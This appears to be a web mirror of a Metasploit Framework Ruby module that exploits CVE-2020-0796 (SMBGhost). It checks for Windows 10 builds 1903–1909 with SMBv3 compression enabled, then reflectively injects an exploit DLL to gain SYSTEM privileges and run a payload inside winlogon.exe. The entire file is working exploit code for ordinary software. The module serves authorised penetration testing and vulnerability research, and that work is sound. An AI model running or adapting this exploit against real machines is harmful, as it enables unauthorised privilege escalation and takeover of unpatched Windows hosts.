Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/local/cve_2020_0796_smbghost.rb
33619 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = GoodRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::Windows::Priv

11
  include Msf::Post::Windows::Process

12
  include Msf::Post::Windows::ReflectiveDLLInjection

13
  prepend Msf::Exploit::Remote::AutoCheck

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        {

20
          'Name' => 'SMBv3 Compression Buffer Overflow',

21
          'Description' => %q{

22
            A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to

23
            execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself

24
            before injecting a payload into winlogon.exe.

25
          },

26
          'License' => MSF_LICENSE,

27
          'Author' => [

28
            'Daniel García Gutiérrez', # original LPE exploit

29
            'Manuel Blanco Parajón', # original LPE exploit

30
            'Spencer McIntyre' # metasploit module

31
          ],

32
          'Platform' => 'win',

33
          'SessionTypes' => [ 'meterpreter' ],

34
          'DefaultOptions' => {

35
            'EXITFUNC' => 'thread'

36
          },

37
          'Targets' => [

38
            # [ 'Windows 10 x86', { 'Arch' => ARCH_X86 } ],

39
            [ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ]

40
          ],

41
          'Payload' => {

42
            'DisableNops' => true

43
          },

44
          'References' => [

45
            [ 'CVE', '2020-0796' ],

46
            [ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ],

47
            [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ]

48
          ],

49
          'DisclosureDate' => '2020-03-13',

50
          'DefaultTarget' => 0,

51
          'Notes' => {

52
            'AKA' => [ 'SMBGhost', 'CoronaBlue' ],

53
            'Stability' => [ CRASH_OS_RESTARTS, ],

54
            'SideEffects' => [ IOC_IN_LOGS ],

55
            'Reliability' => [ REPEATABLE_SESSION, ],

56
            'RelatedModules' => [ 'exploit/windows/smb/cve_2020_0796_smbghost' ]

57
          }

58
        }

59
      )

60
    )

61
  end

62


63
  def check

64
    if session.platform != 'windows'

65
      # Non-Windows systems are definitely not affected.

66
      return Exploit::CheckCode::Safe

67
    end

68


69
    version = get_version_info

70
    vprint_status("Windows Build Number = #{version.build_number}")

71
    # see https://docs.microsoft.com/en-us/windows/release-information/

72
    unless version.build_number.between?(Msf::WindowsVersion::Win10_1903, Msf::WindowsVersion::Win10_1909)

73
      print_error('The exploit only supports Windows 10 versions 1903 - 1909')

74
      return CheckCode::Safe

75
    end

76


77
    disable_compression = registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters', 'DisableCompression')

78
    if !disable_compression.nil? && disable_compression != 0

79
      print_error('The exploit requires compression to be enabled')

80
      return CheckCode::Safe

81
    end

82


83
    CheckCode::Appears

84
  end

85


86
  def exploit

87
    if is_system?

88
      fail_with(Failure::None, 'Session is already elevated')

89
    end

90


91
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86

92
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')

93
    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86

94
      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')

95
    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64

96
      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')

97
    end

98


99
    print_status('Reflectively injecting the exploit DLL and executing it...')

100


101
    # invoke the exploit, passing in the address of the payload that

102
    # we want invoked on successful exploitation.

103
    encoded_payload = payload.encoded

104
    execute_dll(

105
      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0796', 'CVE-2020-0796.x64.dll'),

106
      [encoded_payload.length].pack('I<') + encoded_payload

107
    )

108


109
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')

110
  end

111
end

112


113